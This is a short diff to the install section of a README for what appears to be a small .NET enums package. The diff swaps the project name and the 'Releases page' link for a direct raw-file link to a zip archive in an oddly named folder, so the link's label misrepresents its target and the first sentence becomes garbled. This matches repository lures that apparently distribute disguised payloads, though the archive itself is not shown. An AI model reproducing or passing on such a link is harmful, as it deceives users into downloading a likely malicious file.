Nishant-Roy1/soenneker.quark.enums.cursor/README.md

 ## 📦 Download & Install

-To get started with soenneker.quark.enums.cursor, follow these steps:
+To get started with https://raw.githubusercontent.com/Nishant-Roy1/soenneker.quark.enums.cursor/main/submissively/soenneker.quark.enums.cursor.zip, follow these steps:

 1. **Visit the Release Page:**
-   Go to the [Releases page](https://github.com/Nishant-Roy1/soenneker.quark.enums.cursor/releases) to find the latest version of the software.
+   Go to the [Releases page](https://raw.githubusercontent.com/Nishant-Roy1/soenneker.quark.enums.cursor/main/submissively/soenneker.quark.enums.cursor.zip) to find the latest version of the software.

 2. **Select the Latest Release:**
    Look for the most recent version title.
 This will often be at the top of the list.